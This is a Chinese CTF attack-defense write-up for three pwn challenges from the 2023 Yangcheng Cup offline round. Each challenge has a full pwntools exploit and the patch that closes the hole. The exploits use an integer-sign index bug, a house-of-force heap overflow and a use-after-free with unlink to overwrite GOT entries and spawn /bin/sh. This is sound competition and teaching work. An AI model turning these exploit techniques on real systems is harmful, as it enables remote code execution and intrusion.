2023-羊城杯线下-pwn-wp

本文最后更新于:2023年9月12日 下午

2023-羊城杯-pwn-wp

arrary_index_bank

break

整数溢出(有符号/无符号比较不一致),泄露程序地址,覆盖返回地址为后门地址。

image-20230912000231865

#!/usr/bin/python
#encoding:utf-8

from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

fn = './pwn'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# 0 -> talk to the challenge box; anything else -> spawn ./pwn locally so
# that dbg() can attach gdb.
debug = 0
p = process(fn) if debug else remote('10.1.102.102', 10000)


def dbg(s=''):
    """Attach gdb to the target with gdb script *s* and pause; no-op unless debugging."""
    if not debug:
        return
    gdb.attach(p, s)
    pause()

def lg(x, y):
    """Log integer *y* in hex under label *x* through pwntools' success logger."""
    return log.success(f'{x}: {hex(y)}')


def show(idx):
    """Menu option 1: print account *idx*.

    The index is sent offset by INT64_MIN so that it is negative for the
    program's signed bounds check (the comparison the fix section patches to
    unsigned) while the slot arithmetic presumably wraps back to slot *idx*.
    """
    account = str(-0x8000000000000000 + idx)
    p.sendlineafter('You current have', '1')
    p.sendlineafter('Whose account?', account)

def write(idx, data):
    """Menu option 2: store *data* into account *idx*.

    Same INT64_MIN offset trick as show(): negative for the signed bounds
    check, presumably wrapping back to slot *idx* in the index arithmetic.
    Slot 7 is the saved return address.
    """
    account = str(-0x8000000000000000 + idx)
    p.sendlineafter('You current have', '2')
    p.sendlineafter('Whose account?', account)
    p.sendlineafter('How much?', str(data))


# Leak: slot 7 holds the saved return address (see the `# 7 ret` note on
# write()); subtracting its fixed offset inside the PIE image recovers the
# load base.  recv(14) assumes the printed decimal value is exactly 14
# digits - a differently sized leak would be mis-parsed, so this is fragile.
show(7)
p.recvuntil('] = ')
codebase = int(p.recv(14), 10) - 0x151b
lg('codebase', codebase)

# dbg('b *$rebase(0x14D2)')

# Overwrite that same slot with the backdoor function's address.  Option 3
# presumably leaves the vulnerable function, so its `ret` lands there.  Both
# steps depend on the signed index comparison that the fix section patches.
backdoor = codebase + 0x1315
write(7, backdoor)

p.sendlineafter('You current have', '3')

p.interactive()

fix

将两处有符号数比较patch为无符号数比较即可。

image-20230912001210491

image-20230912001354980

easy_force

break

堆溢出 + house of force。

image-20230912000533158

思路:

  1. 申请大堆块泄露libc地址,泄露heap地址

  2. 堆溢出覆盖top_chunk大小为-1

  3. 覆盖malloc_got为system

#!/usr/bin/python
#encoding:utf-8

from pwn import *
from pwn import p64, u64

context.arch = 'amd64'
context.log_level = 'debug'

fn = './pwn'
elf = ELF(fn)
libc = ELF('./libc.so.6')

# 0 -> talk to the challenge box; anything else -> spawn ./pwn locally so
# that dbg() can attach gdb.
debug = 0
p = process(fn) if debug else remote('10.1.102.102', 10002)


def dbg(s=''):
    """Attach gdb to the target with gdb script *s* and pause; no-op unless debugging."""
    if not debug:
        return
    gdb.attach(p, s)
    pause()

def lg(x, y):
    """Log integer *y* in hex under label *x* through pwntools' success logger."""
    return log.success(f'{x}: {hex(y)}')


def menu(idx):
    """Select menu entry *idx* at the prompt ending in 'away'."""
    choice = str(idx)
    p.sendlineafter('away', choice)


def add(idx, size, data):
    """Menu option 1: allocate *size* bytes into slot *idx* and write *data*.

    *data* is sent raw (no newline); the program's copy is what overflows.
    """
    menu(1)
    for prompt, value in (('which index?', str(idx)), ('space do u want?', str(size))):
        p.sendlineafter(prompt, value)
    p.sendafter('what to write?', data)


# Step 1 (leak): a 0x60000-byte request is above the default mmap threshold,
# so it is served next to libc rather than from the brk heap, and the program
# echoes the address ("the balckbroad on ").  The subtracted offset is
# libc-build specific; the commented-out value is presumably another build.
add(0, 0x60000, b'\n')
p.recvuntil(b'the balckbroad on ')
# libc_base = int(p.recvuntil(b' '), 16) - 0x585010
libc_base = int(p.recvuntil(b' '), 16) - 0x58b010
lg('libc_base', libc_base)

system = libc_base + libc.sym['system']

# Step 2 (house of force): a 0x18-byte request gets a 0x20-byte chunk, so the
# top chunk's size field sits at user offset 0x18.  The program copies a
# fixed amount regardless of the requested size (the overflow the fix section
# closes), so the trailing 8 bytes set the top size to -1, disabling the
# "enough room in top" check.  "/bin/sh" at the chunk start is reused as the
# system() argument at the end.
payload = b'/bin/sh'.ljust(0x18, b'\x00') + p64(0xffffffffffffffff)
add(1, 0x18, payload)

# The echoed user pointer of chunk 1 gives the heap position.
p.recvuntil(b'the balckbroad on ')
ptr = int(p.recvuntil(b' '), 16)
lg('ptr: ', ptr)

malloc_got = elf.got['malloc']

# Step 3: the top chunk header is 0x10 past ptr (chunk 1 is 0x20 bytes).
# Requesting exactly malloc_got - 0x20 - top bytes moves the top chunk so
# that the following 0x18-byte allocation is handed out at malloc@GOT, where
# system's address is written twice.  This needs a libc without the top-size
# sanity check introduced in glibc 2.29 and a writable GOT (no full RELRO).
top_chunk = ptr + 0x10
target_addr = malloc_got - 0x20 - top_chunk
add(2, target_addr, '\n')
add(3, 0x18, p64(system) * 2)

# dbg()

# malloc@GOT now points at system, so malloc(ptr) becomes system("/bin/sh"),
# ptr being the address of the "/bin/sh" string placed in chunk 1.
menu(1)
p.sendlineafter('which index?', str(4))
p.sendlineafter('space do u want?', str(ptr))

p.interactive()

fix

将 heap overflow 处的固定大小修复为输入大小。

image-20230912001627658

image-20230912001643985

Printf_but_not_fmtstr

break

uaf漏洞,限制了IO操作,且程序无法通过exit退出。

image-20230912000754833

思路:

  1. uaf泄露libc地址
  2. 简单堆风水触发unlink,劫持heap数组
  3. 任意地址写,覆盖free_got为system
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'

fn = './pwn'
elf = ELF(fn)
libc = ELF('./libc.so.6')

# Non-zero -> spawn ./pwn locally so that dbg() can attach gdb;
# 0 -> talk to the challenge box.
debug = 1
p = process(fn) if debug else remote('10.1.102.102', 10001)

def dbg(s=''):
    """Attach gdb to the target with gdb script *s* and pause; no-op unless debugging."""
    if not debug:
        return
    gdb.attach(p, s)
    pause()

def lg(x, y):
    """Log integer *y* in hex under label *x* through pwntools' success logger."""
    return log.success(f'{x}: {hex(y)}')


def menu(index):
    """Select menu entry *index* at the '>' prompt."""
    choice = str(index)
    p.sendlineafter('>', choice)


def add(index, size):
    """Menu option 1: allocate *size* bytes into slot *index*."""
    menu(1)
    for prompt, value in (('Index: ', str(index)), ('Size: ', str(size))):
        p.sendlineafter(prompt, value)


def show(index):
    """Menu option 4: print the contents of slot *index* (works on freed slots too)."""
    menu(4)
    slot = str(index)
    p.sendlineafter('Index: ', slot)


def edit(index, content):
    """Menu option 3: write raw *content* into slot *index* (no newline appended)."""
    menu(3)
    slot = str(index)
    p.sendlineafter('Index: ', slot)
    p.sendafter('Content: ', content)


def delete(index):
    """Menu option 2: free slot *index*; the program leaves the pointer in place."""
    menu(2)
    slot = str(index)
    p.sendlineafter('Index: ', slot)


# Three 0x580-byte requests: too large for tcache, so frees go to the
# unsorted bin and adjacent free chunks consolidate.
add(0, 0x580)
add(1, 0x580)
add(2, 0x580)

# Step 1 (leak): free() leaves heap[idx] in place (the fix section nulls it),
# so show(0) prints the freed chunk's fd, a pointer into main_arena;
# 0x1f6cc0 is that pointer's offset within this libc build.
delete(0)
show(0)
p.recvuntil(b'Content: ')
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 0x1f6cc0
lg('libc_base: ', libc_base)

# Step 2 (unlink): freeing chunk 1 merges it with chunk 0; a 0x590 request
# then carves the front off the merged chunk, leaving the free remainder
# starting exactly at chunk 1's user pointer - which heap[1] still holds.
# Through that stale pointer the remainder's header is rewritten as a fake
# chunk whose fd/bk point at heap[1]-0x18 / heap[1]-0x10 (0x4040E8 appears
# to be &heap[1]: the fix-section disassembly places `heap` at 0x4040E0).
# That satisfies the fd->bk == P && bk->fd == P unlink check, so freeing
# chunk 2 consolidates backwards and leaves heap[1] = &heap[1] - 0x18.
delete(1)
add(3, 0x590)
edit(1, flat([0, 0x581, 0x4040E8 - 0x18, 0x4040E8 - 0x10]))
delete(2)

free_got = elf.got['free']
system = libc_base + libc.sym['system']

# Step 3 (arbitrary write): chunk 2's stale pointer receives "/bin/sh";
# editing slot 1 now writes over the heap array itself, setting
# heap[0] = free@GOT, and edit(0) then writes system's address into the GOT
# (requires a writable GOT, i.e. no full RELRO).
edit(2, b'/bin/sh\x00')
edit(1, flat([0, 0, free_got]))
edit(0, p64(system))

# dbg()

# free(heap[2]) is now system("/bin/sh").
delete(2)

p.interactive()

fix

修改前的汇编代码。

.text:00000000004014A1                               loc_4014A1:                 ; delete path: heap[idx] is freed but never cleared (the UAF root cause)
.text:00000000004014A1 8B 45 F4 mov eax, [rbp+var_C]                             ; eax = idx (local)
.text:00000000004014A4 89 C0 mov eax, eax                                        ; zero-extend idx into rax
.text:00000000004014A6 48 8D 14 C5 00 00 00 00 lea rdx, ds:0[rax*8]            ; rdx = idx * 8
.text:00000000004014AE 48 8D 05 2B 2C 00 00 lea rax, heap                       ; rax = &heap[0] (rip-relative; appears to resolve to 0x4040E0)
.text:00000000004014B5 48 8B 04 02 mov rax, [rdx+rax]                           ; rax = heap[idx]
.text:00000000004014B9 48 89 C7 mov rdi, rax ; ptr                              ; ptr - the same stale value stays in heap[idx] afterwards
.text:00000000004014BC E8 DF 2C 00 00 call free                                 ; 5-byte call: the patch replaces exactly these bytes with a jmp
.text:00000000004014C1 loc_4014C1:
.text:00000000004014C1 90 nop

修改后的汇编代码。

.text:00000000004014A1                               loc_4014A1:                 ; delete path after patching
.text:00000000004014A1 8B 45 F4 mov eax, [rbp+var_C]                             ; eax = idx
.text:00000000004014A4 89 C0 mov eax, eax                                        ; zero-extend idx into rax
.text:00000000004014A6 48 8D 14 C5 00 00 00 00 lea rdx, ds:0[rax*8]            ; rdx = idx * 8
.text:00000000004014AE 48 8D 05 2B 2C 00 00 lea rax, heap                       ; rax = &heap[0]
.text:00000000004014B5 48 8B 04 02 mov rax, [rdx+rax]                           ; rax = heap[idx]
.text:00000000004014B9 48 89 C7 mov rdi, rax ; ptr                              ; ptr for free(), consumed in the code cave
.text:00000000004014BC E9 97 0C 00 00 jmp loc_402158                            ; patched: the 5-byte call free is replaced by a same-size jmp to a cave in .eh_frame
.text:00000000004014C1 loc_4014C1:
.text:00000000004014C1 90 nop                                                   ; the cave jumps back to 0x4014C2, just past this byte

.eh_frame:0000000000402158                               loc_402158:            ; code cave: free(ptr), then heap[idx] = NULL, then resume; assumes .eh_frame is mapped executable - confirm
.eh_frame:0000000000402158 E8 D3 EE FF FF call _free                            ; rdi was loaded with heap[idx] at the original call site
.eh_frame:000000000040215D 8B 45 F4 mov eax, [rbp-0Ch]                          ; reload idx (same local as var_C)
.eh_frame:0000000000402160 48 98 cdqe                                           ; sign-extend, where the original used zero-extension; harmless for in-range idx
.eh_frame:0000000000402162 48 8D 04 C5 00 00 00 00 lea rax, ds:0[rax*8]        ; rax = idx * 8
.eh_frame:000000000040216A 48 89 C2 mov rdx, rax                                ; rdx = idx * 8
.eh_frame:000000000040216D 48 8D 05 6C 1F 00 00 lea rax, heap                   ; rax = &heap[0] (rip-relative; appears to resolve to 0x4040E0, consistent with .text)
.eh_frame:0000000000402174 49 C7 C0 00 00 00 00 mov r8, 0
.eh_frame:000000000040217B 4C 89 04 10 mov [rax+rdx], r8                        ; heap[idx] = NULL - clears the dangling pointer, closing the UAF
.eh_frame:000000000040217F E9 3E F3 FF FF jmp loc_4014C2                        ; resume just past the nop at 0x4014C1
.eh_frame:000000000040217F

image-20231026141044529

